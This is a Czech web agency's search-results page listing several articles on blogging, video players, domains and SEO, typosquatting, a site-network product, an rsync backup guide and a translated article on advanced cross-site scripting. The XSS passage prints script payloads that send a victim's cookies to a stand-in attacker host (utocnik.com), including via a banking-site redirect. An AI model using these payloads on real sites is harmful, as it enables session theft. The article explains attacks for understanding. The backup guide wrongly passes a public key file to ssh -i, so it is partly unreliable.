Výsledky vyhledávání v sekci Webové stránky na dotaz serveru útočníka

5 důvodů proč je blog dobrý pro váš business

access_time13.květen 2019personJana

Důvodů, proč si založit blog může být mnoho. Jedním znich často bývá (a měla by být) podpopora vašeho podnikání. Proč? Podle statistik (serveru Hubspot) firmy, které pravidleně blogují mají o 55% vyšší návštěvnost stránek než ti, co to nedělají. A více návštěv znamená více prodejů :-)-  Podívejme se podrobněji na 5 způsobů, jak vám blog může pomoci získávat více pontencionálních zákazníků, kteří se budou nadšeně vracet:1) Lepší SEO – tedy vyhledatelnost vaší stránky ve vyhledávačích jako je Google nebo Seznam. Roboti Googlu milují stránky, na kterých je pravidelně přidáván nový a originální obsah bohatý na klíčová slova. Blogování tedy pomůže vašim potencionálním zákazníkům, aby vás našli.2) Vybudování vaší značky. Blog je dobrým způsobem, jak informovat vaše potencionální zákazníky, dát jim vědět, kdo jste a o co vám jde, budovat důvěru…3) Odlišení se od konkurence. Blog vám dává příležitost ukázat, v čem jste jiní než vaše konkurence (a podívejte se, kolik z vašich konkurentů už bloguje?)4) Pozice autority. Pokud budete na blogu sdílet s vašimi čtenáři hodnotné informace a rady, vybudujete si silnou pozici a lidé vám budou důvěřovat. A pak u vás také nakoupí.5) Důkaz, že váš business žije. Možná také někdy na webových stránkách přemýšlíte, jestli firma vůbec existuje a stojí za ní reální lidé. Díky pravidelnému blogování vaši zákazníci uvidí, díky datu u každého příspěvku, že se na vašich stránkách opravdu něco děje, že za nimi stojí reální lidé, kteří se snaží pomoci svým (potencionálním) zákazníkům.Pokud zatím nevíte, jak na to, přečtěte si další články zde na blogu a sledujte mě i nadále, ať vám neunikne „Blogování pro podnikání“ – online škola, kterou pro vás připravuji!Aktualizace: v souvislosti s novým článkem Jakou zvolit platformu pro váš blog bych zde jen upozornila, že pokud máte firmu a firemní blog, je nejlepší udělat blog součástí přímo vašeho webu – ať už jako samostatnou položku menu (a odkazy na nové články například uvádějte na hlavní stránce, abyste na ně upozornili návštěvníky), nebo třeba jako subdoménu typu blog.mojefirma.cz apod. Poptejte se svého administrátora nebo toho, kdo vám web vytvořil, jak to nejlépe technicky zařídit.

folder_openPřiřazené štítky

Přehrávání videa na stránkách

access_time29.říjen 2019personAdmin

Pokud potřebujete mít na své internetové stránce také přehrávání videa, pak nepřestávejte číst. Zajímavým doplňkem mnoha webových stránek se stalo právě video, které dokáže stránky obohatit a zpestřit. Musí být však vhodně zvolené. Například u jazykové školy zvolíme video ukazující činnost školy, ale také pneuservis si může umístit na web video v podobě své práce. Velkým trendem se stalo ale i vkládání videí u cestovních kanceláří, kde odkazují na zajímavé turistické destinace. Zákazníci tak mají lepší představivost o navštěvované zemi.Co zvolit pro přehrávání videa?Je ale potřeba zvolit vhodný program, díky němuž přehrajete video na internetových stránkách. První a snad nejrozšířenější možností se stává vložení videa prostřednictvím YouTube. Tato volba dominuje hned několika výhodami, ale také nevýhodami. Mezi přední výhody se řadí skutečnost, že vložení videa zvládne i laik. YouTube Vás neomezuje na formáty videa a statistiky návštěv jsou ve špičkové kvalitě. Díky YouTube nebudete zatěžovat svůj vlastní server, co se týče výkonu a objemu dat. Mezi nevýhody se řadí vkládaná cizí reklama ve stále větším měřítku. Pro mnohé je negativní i skutečnost, že nemůžete kontrolovat svá data, obsah může být totiž kdykoliv smazán, a to bez udání důvodů.Další možností, která se nabízí, je vlastní přehrávač videa. K použití je například FlowPlayer. Velkou výhodou je, že máte videa umístěná „u sebe“, laicky řečeno. Přehrávač si přizpůsobíte dle vlastních potřeb a můžete nastavit dokonce jeho speciální funkce, jako je zapnutí dalšího videa po skončení přehrávání. Video také můžete propojit s Google Analytics. Avšak zatěžujete svůj vlastní serveru, přičemž narazíte mnohdy i na datové omezení webhostingu. Video musíte konvertovat do požadovaného formátu a za funkčnost vlastního playeru často budete muset na svých webových stránkách zaplatit, protože se jedná o rozšíření.Co si tedy zvolit?Nyní však zůstává otázkou, pro kterou možnost se rozhodnout. Pokud tedy nepotřebujete nastavovat žádné speciální funkce, plně si vystačíte s videi na YouTube, ale musíte denně kontrolovat, zda nebyl obsah smazán. Návštěvníci Vašeho webu by byli zklamaní, že video nejde přehrát. Máte-li však rozsáhlý projekt, který si vyžaduje mnoho nastavení, pak si zvolte svůj vlastní přehrávač.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SEO a vyhledávače na dotaz serveru útočníka

Doména a optimalizace pro vyhledávače

access_time21.březen 2020personRedakce

Podíváme se dnes na to jak doména ovlivňuje optimalizaci pro vyhledávače neboli SEO. Odpovíme na všechny otázky co týče toho, jaká doména je lepší pro SEO a jaká má větší schopnost prodávat.Stáři doményStáří domény je nejsilnější kritérium pro optimalizaci pro vyhledávače. Čím starší doména tím lepší, jelikož stará doména je znakem toho, že projekt umístěný na této www prezentaci působí dlouho. Při tvorbě webových stránek doporučujeme kupovat starší doménu stojí to sice více peněz, ale při této investici je určitě zřetelné, že projekt bude mít budoucnost a bude naplněn unikátním obsahem. I když vyhledávač nemůže zkontrolovat za jakou cenu byla doména pořízena může zkontrolovat přes WHO IS datum založení domény.Nedoporučujeme kupovat doménu, která je méně starší než jeden rok, jen v případě že si kupujete absolutně novou. Ještě jedna výhoda starých domén je ta, že na ně vedou odkazy, které jsou taktéž staré, i když nevždy relevantní.Klíčový výraz v doméněMůžete mít buď stoprocentní shodu s klíčovým slovem a doménou, to znamená výraz ubytování Chorvatsko a doménu ubytovanichorvatsko.cz.Obsažení klíčového slova v doméně je sice plus, ale neznamená to nějaký zázrak přiblížíte se k úspěchu o 25%. Při malé konkurenci v daném tématu Vám stačí jenom doména s vyhledávaným souslovím a pár odkazů k dosáhnutí výsledku při optimalizaci pro vyhledávače. V případě že chcete být v TOPu při velkém trhu a velké konkurenci, samotná doména s klíčovým výrazem Vám nepomůže dosáhnout maxima a potřebujete stejně provádět jiné metody pro SEO.Doména: stáři a klíčový výraz spoluV případě, že si pořídíte novou doménu s vyhledávaným výrazem, nemusí to znamenat vždy úspěch. Vyhledávače nemají rádi nové domény a koukají na ně opatrně, aby se předešlo spamu nebo černým metodám od SEO specialistů. Většinou domény s populárními klíčovými výrazy jsou už dávno obsazeny, proto při koupi nějaké domény získáváte vyhledávající doménu a také výhodu slušného stáří.Špatně vybrané doményDomény typu levne-ubytovani-chorvatsko-pro-rodiny.cz je špatný výběr pro Vaší internetovu stránku. I když v předchozím článku jsme psali, že klíčový slova jsou dobrá v doméně, ale vše musí mít své hranice. Doména musí být rychle zapamatovatelná a jednoduchá, aby jste věděli jak správně vybrat doménu doporučujeme také přečíst náš článek - Doména pro www stránku jak si správně vybrat, na kterém naleznete všechna hlavní kritéria.Domény .COM proti .ORG, .NETDomény s koncovkou .COM jsou v dnešní době nejpopulárnější domény pro mezinárodní internet. Domény .COM stojí více než jejich konkurence jako jsou .NET nebo .ORG. Pro uživatele ze všech státu jsou lepší pro zapamatování domény s .COM než ostatní. Pro vyhledávač mnoho nepřináší, ale vyhledávač je jen pomůcka pro lidi, takže myslete na klienty. Domény .INFO obcházejte stranou, tyto koncovky nevyvolávají od uživatelů chuť klikat na danou stránku, lidi těmto doménám moc nedůvěřují a často se nevyskytují.Domény regionální jako jsou .CZ nebo .SK jsou dobré pro zaměření na jeden stát nebo region. Jsou špatné pro optimalizaci na mezinárodní vyhledávače, ale jsou dobré na určitou oblast pro optimalizaci. Snadno řečeno ve vyhledávači Seznam.cz je větší pravděpodobnost, že se objeví koncovka .CZ než .COM, ale na Google.com je to naopak.Délka doményJak lidé tak i vyhledávače nemají rádi zbytečně dlouhé domény. Proto nedoporučujeme kupovat domény s příliš dlouhým názvem. V tomto případě existuje snadné heslo čím kratší tím lepší.Server a umístění doményV případě, že si koupíte doménu s koncovkou .CZ je dobrý si také koupit místo na serveru v České republice. Sice tato webová stránka bude mít špatný umístění třeba v Německu, ale na českým trhu získáte větší prioritu.V případě, že si nebudete vědět rady s koupí doménu můžete se obrátit na naší společnost a my Vám poradíme s výběrem doménu pro Vaší internetovou stránku.

folder_openPřiřazené štítky

Copywriting a cílené překlepy

access_time22.březen 2020personRedakce

Ještě nedávno existovali webové stránky typu lcg.com, 100her.cz, gogle.cz či gmal.com, jistě se i v dnešní době můžete setkat s podobnými stránkami a v tomto článku se zaměříme na to jak vydělávají.Stále existuje celá řada podobných stránek, na které v tomto článku nechceme uvádět odkazy, proto byli záměrně vybrány webové stránky, které již neexistují. Tyto weby vydělávají díky slavnějším a známějším vzorům. Uživatelé se často dopouští překlepů, a proto kvůli překlepu se ocitnou úplně jinde. Mnohdy se dostanou do spárů reklamních lákadel, ale v tom horším případě na pornografický server. Překlepy nejsou v internetovém prostředí raritou. Jelikož zadáváme většinu adres ve spěchu, často se dopouštíme překlepů. Některé studie dokonce uvádí, že deset až dvacet procent všech ručně psaných www adres je psáno špatně.Člověk není neomylný - TyposquatterChyby v adresách, jichž se dopouštíme, může být hned několik. Jednak se jedná o pravopisné chyby, jako například mobyl.cz či překlep wwwgoogle.com. Také můžeme přeměnit namísto jednotného čísla množné, jako například seznamy.cz. Jakmile zadáte chybnou adresu, nevíte, na jaký typ stránek se dostanete. Tato chvíle je pak vhodná pro typosquattery.Typosquatter je internetový podnikatel, který vydělává na chybách druhých. Vytipuje si nějakou adresu, na níž umístí svůj vlastní obsah. Adresy se ale nenáhodně podobají některému z nejnavštěvovanějších serverů. Typosquatter si tak zajistí dostatečný počet návštěvníků, aniž by musel spouštět reklamní kampaň.Co na to copywriteři?Pokud budu mluvit za sebe, pak si nedokážu představit, že bych měl psát texty s úmyslnými gramatickými chybami. Jednak by byl pro mě článek nehodnotný a byla by pro mě ostuda takový článek prodávat. Ano, teoreticky je to práce jako každá jiná, ale prakticky se každý copywriter snaží, aby napsal co nejlepší text.Jak se před typosquattery ochránit?Nejlepší je zaregistrovat si i domény s několika překlepy, abyste předešli tomu, že by si některý typosquatter zaregistroval Vaši adresu s překlepy. Zabráníte tak internetovým zlatokopům, ale také jim nedovolíte, aby na Vašem jméně nevydělával někdo jiný.

folder_openPřiřazené štítky

Nejčastější chyby optimalizace pro vyhledávače

access_time22.březen 2020personRedakce

Nejčastější chyby optimalizace pro vyhledávače1. Neexistuje soubor robots.txtTento soubor slouží k definování části internetových stránek, které by vyhledávač neměl indexovat. Často se stává, že vyhledávač indexuje stránky pro tisk a tím vzniká zbytečná duplikace obsahu na internetových stránkách. Taktéž je naprosto zbytečné a nesmyslné, když se indexují stránky s vyhledávajícími výsledky.2. Duplicita hlavní stránkyMnohdy a to celkem často se setkáváme s internetovými stránkami, kde není odstraněná duplicita hlavní stránky domény. Potom se stává že vyhledávač zaindexuje stránku jako http://www.mojedomena.cz a také http://mojedomena.cz a mnohdy i http://www.mojedomena.cz/index.html atd. Potom podrážíte sami svůj projekt. Při tvorbě webových stránek, můžete upozornit vývojáře na tyto problémy, aby se jim předešlo.3. Nepřesné stavové kódy serveruJednoduše řečeno je dost podstatné pro vyhledávač, aby když náhodou nějaká stránka nebude funkční, neboli nebude existovat, může se to stát z důvodu, že taková stránka ani nikdy neexistovala a je na ní odkaz omylný nebo jste danou stránku smazali, musí na ní vést stavový kód 404. Když na špatnou neboli na nefunkční stránku bude vést kód 200 znamená to, že je vše v pořádku a pro Vás to bude znamenat jen jedno, že vyhledávač zaindexuje stránku se špatným obsahem což může vést jak k duplicitě tak i k vyloučení stránky z vyhledávaných výsledku.4. Mapa stránek neboli sitemapMapa stránek je pomůcka jak pro uživatele tak i pro vyhledávajícího robota. Mapou stránek umožnujete se dostat na jakoukoliv Vaši stránku. Proto není třeba procházet pomalu celý Váš web, když to občas není možné buď z důvodu, špatné struktury webové stránky, nebo záměrného skrytí stránek před uživateli. Mapa stránek může být a většinou je ve formátu .xml. Tuto mapu stránek neboli sitemap můžete poslat Vyhledávači Google přes Webmaster Tools, pro Seznam.cz je třeba se odkázat na sitemap přes zmíněný robots.txt5. Flash a obrázková internetová stránkaV případě že se chcete zaměřovat na optimalizaci pro vyhledávače tak i tvorba webových stránek tomu musí odpovídat. Vyhledávač je robot, který plní roli uživatele, proto jeho hlavní cíl je navštěvovat internetové stránky a číst texty. V dnešní době vyhledávače ještě nejsou tak inteligentní, aby rozpoznávaly obrázky i když se o to pokouší, ale zatím jenom jako experiment. Proto je dost podstatné vědět, že pro úspěch je především důležité používat textovou formu webové stránky s grafikou. Ale v žádném případě nepouživat Flash webové stránky, které slouží jen pro zábavu a neobsahují textovou podobu. Jsou samozřejmě techniky jak optimalizovat Flash web pro vyhledávač, ale o tom někdy přístě. V žádném případě nepoužívejte menu, které je uděláno z obrázku tam ztrácíte textovou hodnotu odkazu. O textové hodnotě se můžete dozvědět v předešlém článku Důležitost odkazů pro vyhledávače.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SocialWeb na dotaz serveru útočníka

Co je SocialWeb? ..vytváření privátních webových sítí.

access_time20.květen 2019personRedakce

SocialWeb není úplně vhodný pro jednotlivce, jejichž zájem je vytvořit si portfólio a nebo jednoduchou webovou prezentaci a to hned z několika důvodů:1. Firemní a nebo osobní webová prezentace se dá lépe postavit například přes WordPress a nebo X online nástrojům (Webnode,Wix….)2. Takový jednotlivci systém SocialWeb zkrátka nevyužijí a pro jiné uživatele systému SocialWeb jejich aktivity jak si povíme níže mají nulovou hodnotu.Takže, SocialWeb zkrátka není určen pro obyčejné uživatele, kteří si chtějí pouze sestavit svou webovou prezentaci a nebo jednoduchý blog.Teď asi nastává otázka pro koho je tedy SocialWeb určen?Víte pro koho je SocialWeb určen?- Marketingové agentury, PR agentury, dokonce i webdesign firmy pro budování microsites.- Pro majitele internetových obchodů pro budování podpůrných tématických webů.- Pro jednotlivce s ambicí stavět a spravovat několik, třeba i desítky webových stránek. Některé ze základních funkcí systému SocialWeb pro tvorbu a správu webových stránek:Vytváření a správa libovolného počtu webových stránek v jednom uživatelském účtu.Správa webhostingů, instalace SSL certifikátů, správa serverů a IP adres zcela automaticky a zdarma.Registrace domén přímo a automaticky z okamžitým nastavením DNS přímo na vám přiřazený server a IP adresu, kdy do několika minut automaticky můžete na zaregistrované doméně stavět web bez žádné akce z vaší strany.Wedos Wapi podpora, kdy můžete SocialWeb využívat jen jako registrační nástroj - tedy, že SocialWeb domény budete registrovat přes váš Wedos účet na vaše fakturační údaje a vše bude fungovat automaticky.Zobrazení a vyhledávání volných domén, SocialWeb monitoruje veškeré expirované domény a následně u nich zjišťuje zda jsou volné, pokud ano, můžete si kteroukoliv volnou expirovanou doménu ihned zaregistrovat, stejně tak můžete ve fulltextu vyhledávat domény, které obsahují konkrétní klíčové slovo. (Nyní je v databázi asi 80 000 CZ volných domén.).Monitoring expirujících domén a roboti pro předregistraci domén, kteří se budou snažit zaregistrovat doménu dříve než spekulanti a nebo jiní roboti za cenu registrace domény (jako alternativa k Daukce.cz, kde pokud doménu chcete, tak jim vlastně o ní řeknete a pak máte možnost si ji vydražit… což mě osobně přišlo vždy jako celkem sprosté.Několik šablon webů, které pak můžete libovolně sestavovat.Tvorba mobilních aplikací.Správa sociálních sítí a účtů, publikace na sociální sítě, plánování publikace…Blog, kategorie, sekce, příspěvky..25 modulů, které lze pro kteroukoliv šablonu použít.Sharelock (zamknutí obsahu, vyžadované sdílení před odemknutím), Agelock (zamknutí obsahu pro návštěvníky mladší X let.Push notifikace, shromažďování uživatelů pro každý z vašich webů, následně rozposílání upozornění v případě vložení nového článku.Pro publikaci automatické generování klíčových slov z obsahu článku (pokud nejsou vyplněny manuálně)Slideshow publikace, Video publikace, YouTube publikace, Publikace na X sociálních sítí, plánování publikace….SEO monitoring a počítání nefunkčních odkazů, kdy systém sleduje všechny URL adresy, které skončili na stránce 404 a management těchto odkazů (přesměrování, BAN…)Automatické opravy nefunkčních odkazů s tím, že se systém snaží najít vhodný článek na základě tagů článků.Kompletní jazykové mutace, weby je možné stavět pro jakoukoliv zem.Tvorba mobilních aplikací…..Slideshow editor (tvorba slideshow pro konkrétní weby)Video editor (stříhání, nahrávání videa i z URL adres) kompilace videa….CSS editor – web staváte na základě nějaké šablony, kdy pak ještě máte možnost šablonu webu překódovat CSS editorem.0% branding, nikde na žádném vašem webu není ani zmínka (ani v řádné URL adrese) o SocialWebu.100% minifikace zdrojového kódu.Možnost stažení zdrojového kódu pro webhosting vašich webů na vašich (Apache,Nginx) serverech.Tvorba a správa emailvých adres pro jakékoliv vaše domény.Vizualizace návštěvnosti a sledování návštěvnostiNewsletter řešení.A další funkce a řešení… Dobře, takže asi chápete, že SocialWeb obsahuje celou řadu nástrojů a funkcí, které komukoliv umožní vytvářet weby, pak je spravovat a také do nich publikovat plus celou řadu nástrojů, které žádná jiná služba nenabízí.Řekněme, že máte firmu a chcete díky SocialWebu vytvořit několik webů, SocialWeb umožňuje kromě výše zmíněných věcí také sestavit si tým, v tomhle ukázkovém případě budou mým týmem tři lidé.Jeden z těchto lidí v týmu se jmenuje Tom a ten také jako jediný umí pracovat se systémem SocialWeb, takže vlastně jeho úkolem a cílem bude celou vaši privátní síť sestavit.- Zaregistruje domény- Vytvoří wwbhostingy- Vytvoří SSL certifikáty- Nastaví PUSH notifikace- Vytvoří weby- Vytvoří a vloží logo pro každý z nich- Vytvoří kategorie a sekce- Sestaví moduly pro každý web- Vytvoří Sociální stránky a účtyTakže Tom vlastně všechno nachystá, pokud vytvoří pouze dvě webové stránky s jednou, která bude přesměrovaná na sekci jiného webu, struktura toho co Tom může nachystat může vypadat třeba takhle:Takže možná již začínáte chápat, že SocialWeb nejsou pouze nástroje pro tvorbu a správu webových stránek, SocialWeb je hlavně koncept vytváření webových sítí.SocialWeb nekonkuruje těm co weby vytváří, online nástrojům pro tvorbu webů, kde máte možnost si vytvořit web a administraci, SocialWeb jsou struktury a vztahy mezi jednotlivými službami a to tak aby všechno bylo maximálně automatizované a jednoduché – tedy aby Tom nepotřeboval znalost programování, zkrátka aby to zvládl téměř každý, tohle je skutečně velmi jednoduchá síť, kterou lze systémem SocialWeb vytvořit, skutečné sítě pak jsou mnohem složitější, sestavené z desítek webů a stovek sociálních účtů a stránek. Teď v týmu máme Janu, ta vůbec neví co je SocialWeb, ani nechápe jak SocialWeb funguje a vlastně to ani nepotřebuje vědět, jejím jediným úkolem je přečíst si zadání a napsat článek, přiložit obrázek (video), zvolit z nabídky sociální sítě a stránky na kterých si přeje tento článek publikovat a vlastně jen kliknout na tlačítko publikovat, to co Jana takto udělá pak vypadá asi tak:Jana dostala úkol publikovat článek na web magazin21.cz na téma Krabičková dieta.Jana článek sepsala a u článku zvolila, že chce tento článek publikovat také na dvou Facebook stránkách, jedné Twitter stránce a do nějaké Pinterest nástěnce.Také u článku zatrhla rozeslat PUSH notifikaci a také rozeslat Email newsletter.Takže zatrhla a sepsala, nic víc dělat nemusela, výsledek?1. Článek byl publikován na web Magazin21.cz do kategorie Hubnutí a styl2. Bylo rozesláno upozornění (PUSH notifikace) všem odběratelům tohoto webu (1013 lidí)3. Byli upozorněni lidé, kteří mají nainstalovanou ios aplikaci webu Magazin21 (800 lidí)4. Byli upozorněni lidé, kteří mají nainstalovanou android aplikaci webu Magazin21 (3200 lidí)5. Bylo odesláno 540 emailů 540 odběratelům newsletteru o novém článku6. Článek byl publikován do Facebook stránky Jíme zdravě (1000 členů)7. Článek byl publikován do Facebook stránky Magazin21 (250 lajků)8. Článek byl publikován do Twitter stránky Magazin21 (250 odběratelů)9. Článek byl publikován na Pinterest, Instagram, LinkedIn… (X dalších sledujících/odběratelů) Takže jedním publikovaným článkem na jeden web Jana hned oslovila nejméně strovky lidí..Články, která vykazují vysokou počáteční návštěvnost, mají i mnohem vyšší průběžnou čtenost a jsou také rychleji zaindexovány ve vyhledávačích. Takže tohle je SocialWeb?Do teď jsem hovořil o vytváření privátních sítí, jenže tito majitelé firem se svými sítěmi jsou vlastně součástí další sítě, která přináší spoustu výhod, jen bych ještě rád upozornil na to, že využívání těchto komponentů SocialWebu je zdela dobrovolné.Podívejme se na 4 koncepty různých uživatelů SocialWebu:1. To je síť kterou jsem popsal výše, tři členové týmu, dva weby.2. Tohle je síť uživatele, jenž nemá členy týmu ale má 8 webových stránek.3. Uživatel, který nemá ani webové stránky ani členy týmu.4. Uživatel, jenž nemá žádné webové stránky ale má členy týmu. Výhoda – Tvorba obsahu a copywritingUživatel číslo jedna, je vlastně soběstačný, má svůj tým a své weby a vlastně vůbec tuto výhodu nepotřebuje.Uživatel dva má velké množství webů, do kterých by měl neustále dodávat nějaký obsah, jenže pochopitelně na to nemá čas ani kapacitu a přesně z toho důvodu může v SocialWebu existovat uživatel 3 a 4, kteří se vlastně živý copywritingem a dodávají obsah na webové stránky jiných uživatelů.Takže takhle se v SocialWebu může v cloudu tvořit obsah webových stránek.O tom jak funkce pro výkup článků v systému socialweb funguje jsem napsal zde článek.Obsah je velmi důležitý, stejně tak jako to, že každý z webů má návštěvnost, jen tak je pak možné tyto weby efektivně využívat pro SEO, linkbuilding, marketing a PR publikaci.Takže teď již máme webové stránky, strukturu, tým, obsah, návštěvnost a na závěr chci ukázat jak SocialWeb dokáže pomáhat například reklamce a nebo PR agentuře.Výhoda - využívání webů jiných uživatelů pro vaše potřebyTakže vaše privátní síť obsahuje dva weby, ty můžete využívat pro co chcete a jak chcete.Co když budou vaši klienti chtít publikaci PR článků na více jak vašich dvou webech?Co když je váš klient někdo, kdo chcete udělat PR na niche, který se k žádnému z vašich webů nehodí?Tohle se právě v SocialWebu dá skvěle řešit, tímto způsobem můžete propagovat služby, produkty zkrátka vytvářet publikace na jiných webech uživatelů SocialWebu, kteří to v nastavení každého jejich webu a nebo v nastavení kategorie povolí.Pro tyto případy existují tři scénáře.1. Agentura, která má své weby a chce publikovat také na jiných webech (dle obrázku)V této variantě máte zase několik možností, jedna z nich je, pokud chcete publikovat na jiných webech jiných uživatelů umožnit také publikaci jiným subjektům na vaše weby – tak můžete pokrývat náklady za publikaci na jiné weby tzv PR exchange.Nebo můžete mít tolik webů, že nebudete potřebovat další, takže si můžete umožněním publikace jiným přivydělávat a nebo můžete využívat jiné weby a platit za to..2. Agentura, která chce využívat webové stránky pro PR a linkbuilding avšak nemá své weby- V tomto případě existuje služba Prstudio.cz, ve které si můžete zakoupit kredit a vyhledávat weby pro publikaci a nebo prohledávat články pro nahrazení klíčových slov SEO odkazem – SocialWeb tak vlastně vůbec nepotřebujete.3. Agentura / Jednotlivec, který nemá o publikaci zájemNemusíte nic nikam publikovat, můžete jen vytvářet weby a tak na vašich webech vydělávat.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Programování na dotaz serveru útočníka

Zálohování dat v Linuxu na externí server za pomoci Rsync a Cronu

access_time14.duben 2020personZdenek Slavik

Občas se stane, že potřebujete zautomatizovat zálohu dat synchronizací složek na dvou odlišných Linux serverech. Pokud je tohle váš případ, můžu vám poradit jak toto udělat na Linux systému Cent OS 7 nebo Debian.Výsledkem bude, že se Vám bude spouštět každé dvě hodiny automaticky synchronizace, která nahraje chybějící soubory na serveru B ze serveru A. 1. První se ujistěte, že máte nainstalován rsync a SSH ve vašem Linux operačním systému:sudo yum -y install ssh rsyncsudo apt install ssh rsync 2. Přihlašte se na server BNa serveru B vytvoříme složku kam budeme později nahrávat data ze serveru A. Pro přihlášení použijte ideálně root uživatele.2.1 - Vytvoříme na serveru B složkumkdir -p  /var/zaloha2.2 - Pomocí příkazu ss-keygen si necháme vygenerovat public key a private key, které budeme potřebovat a díky nimž později dokážeme rsync zautomatizovat (nebude potřeba zadávat heslo). Nevyplňujte passphrase, ani nic jiného - pouze klikejte na ENTER!ssh-keygen2.3 Takto vygenerovaný public key si ze serveru B zkopírujeme na server Ascp /root/.ssh/id_rsa.pub root@A.cz:/root/id_rsa.pub3. Přihlašte se na server AOpět ideálně jako root!3.1 - Vytvoříme soubor authorized_keysPostupujte přesně podle návodu, včetně oprávnění, jinak vám synchronizace nemusí fungovat.mkdir -p /root/.sshchmod 700 /root/.sshtouch /root/.ssh/authorized_keyschmod 600 /root/.ssh/authorized_keys3.2 - Vložíme do souboru authorized_keys public keyV kroku 2.3 jsme si na server A poslali public key a měli bychom jej najít zde: /root/.ssh/id_rsa.pub, takže si zkopírujeme obsah public key a vložíme do nově vytvořeného souboru authorized_keyscat /root/id_rsa.pub >> /root/.ssh/authorized_keys4. Přihlašte se na server BNyní máme vše připraveno, požadavek na synchronizaci budeme spouštět na serveru B a protože chceme naši synchronizaci zautomatizovat použijeme k tomu CRON ÚLOHU4.1 - Otevřete si soubor /etc/crontab4.2 - Na konec souboru crontab vložte:Zde můžete nastavit kdy se má synchronizace spouštět, níže se bude úloha spouštět každou hodinu, pokud ale chcete spouštět úlohu jedenkrát denně ve dvě ráno, pak můžete použít 0 2 * * *, pokud stejně jako já chcete spouštět cron jednou za hodinu pak použijte:0 * * * * root bash backup.sh4.3 - Vytvoříme backup.sh souborVytvořte si backup.sh soubor, třeba v root/backup.sh a vložte do něj obsah, například:#!/bin/sh/usr/bin/rsync -avz -e "ssh -i /root/.ssh/id_rsa.pub"  root@A.com:/var/lib/mysql   /var/zaloha To je všechno, nyní každou hodinu se spustí backup.sh a zkontroluje zda na serveru A ve složce var/lib/mysql nejsou nějaké soubory, které nejsou ve složce /var/zaloha na serveru B - pokud zjistí, že existují chybějící soubory - automaticky je odešle do složky /var/zaloha na serveru B.Rsync má zajímave flags, díky kterým můžete nastavit například to, že pokud soubor na serveru A neexistuje a na serveru B existuje, protože tam byl zazálohován můžete spouštět:#!/bin/sh/usr/bin/rsync -avz -e "ssh -i /root/.ssh/id_rsa" --delete root@A.com:/var/lib/mysql   /var/zalohaDíky tomu budou soubory na serveru B, které již neexistují na serveru A automaticky ze serveru B odstraněny!Dokumentace funkce rsync a hromady možností nastavení naleznete zde: https://www.samba.org/ftp/rsync/rsync.htmlA nezapomeňte restartovat váš cron:service crond restart

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Hacking na dotaz serveru útočníka

Pokročilé techniky xss (cross-site scripting)

access_time16.červen 2020personRedakce

Popis pokročilého Cross-Site-Scriptingu, se vzdálenou kontrolou v reálném čase, od autora aplikace XSS-proxy jménem Anton Rager. Cross Site Scripting (XSS) je mnoha vývojáři a security profesionály obvykle považován za málo závažnou bezpečnostní zranitelnost. Do dnešní doby vznikla řada projektů s poukazem na potencionální rizika XSS, ale problém je převažne na pokraji zájmu bezpečnostních expertů a to včetně širších souvislostí o které tady jde.Autor aplikace XSS proxy napsal a zveřejnil popis v naději, že se odlehčený pohled na věc změní. Cituji: Doufám, že tímto dokumentem a vydáním nástroje pod jménem XSS-proxy (popsáno níže) změním pohled na celou situaci. XSS-Proxy umožňuje plnou kontrolu XSS útoků vzdáleným uživatelem (útočníkem). Tento dokument popisuje obvyklé XSS útoky a představuje nové metody/nástroje pro vytváření interaktivních XSS útoků, obojsměrných útoků a ještě více zla.Nejedná se o detailní návod (XSS howto), ale o širší vysvětlení metod XSS útoků. CGISecurity XSS FAQ (1) je dobrý zdroj pro celkový pohled na problematiku hlavních XSS zranitelností. V závěru textu jsou reference (2,3,4,5) obsahujíci skvělý materiál pro navazujíci XSS témata.Projekt XSS-proxy nevznikl jako platforma pro diskuzi a řešení. Existuje celá řada zdrojů, metod a možností pro hlášení chyb nebo opravování XSS děr. Pokročilé metody XSS které budou v textu představeny obcházejí mnoho metod aplikovaných proti XSS zranitelnostem. Doporučené čtení o hidden form inputs, URL re-writing, POST methods častokrát podsouvají řešení které nejsou 100% učinné, obzvlásť v případě, že má útočník přístup ke stejnému obsahu (a jscript/values) jako jeho oběť. Zbavit se všech speciálních HTML znaků nebo precizní filtrování vstupu je k ničemu v případě, že existuje neobjevený způsob jak vstup obelstít. Řešením může být rozdelení webových stránek na četné dokumentové domény, kde bude pro útočníka mnohem obtížnější provést/najít XSS útok/zranitelnost v porovnání s jediným místem kde je vše pohromadě. CGI vyhledávání na stránce v jedné subdoméně a citlivé oblasti na další(ch) může být užitečné.Pozadí XSSJako mnoho z vás ví, běžné XSS útoky vycházejí typicky ze dvou základních principů:1 – Útočník uploaduje <script> tag do veřejného fóra, blogu nebo stránek které navštevují uživatelé a obsahují XSS zranitelnost. Útočník pak díky přístupu získa (harvesting cookies) cookies webové stránky ze kterých vyčte řadu důležitých informací a díky tomu častokrát i přítpup k uživatelským účtum. Útoky jsou ale někdy využitelné mnohem hlouběji. Zde je to co myslím a říkam mnoha lidem co XSS přesně znamená. Příklad:Někdo chce odeslat následujíci kód na utocnik.com aby to další uživatelé sprocesovali.<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>Je to pokus o získání obrázku ze serveru útočníka pomocí cookies uživatele blogu priklad.com v URL.2 – Útočník použije veřejný web náchylný na útok XSS jak bylo uvedeno nahoře, nebo email zprávu založenu na XSS pro přesměrování uživatele na druhý server zranitelný pomocí XSS. Druhý server je aktuální cíl útočníka a stránka samozřejme obsahuje vlastní XSS zranitelnost, kde nic netušíci uživatel injektuje obsah <script> do dokumentu, který navenek pouze vidí. To v kombinaci s přesměrováním z dalšího webu umožňuje podvržení cookies, podvržení form/submit obsahu nebo specifickou akci XSSnutého uživatele proti dalšímu webu. Tato metoda je hodně rozšířena ale pramálo admiínistrátorů chápe, že se jedná o způsob útoku. Jak to funguje?Někdo chce odeslat následujíci kód na priklad.com aby to další uživatelé sprocesovali. <script>document.location=’http://ebanking.com/search?name=<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>'</script>Moment kdy je uživatel přesměrován na ebanking.com s hořejší XSS, toto je to co se vrátí uživateli a bude spuštěno:<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>To je pokus o získání obrázku ze serveru útočníka s cookies uživatele ebanking.com v URL.V minulosti hodně lidí zdůrazňovalo, že pokročilou manipulaci s webovým obsahem lze dosáhnout 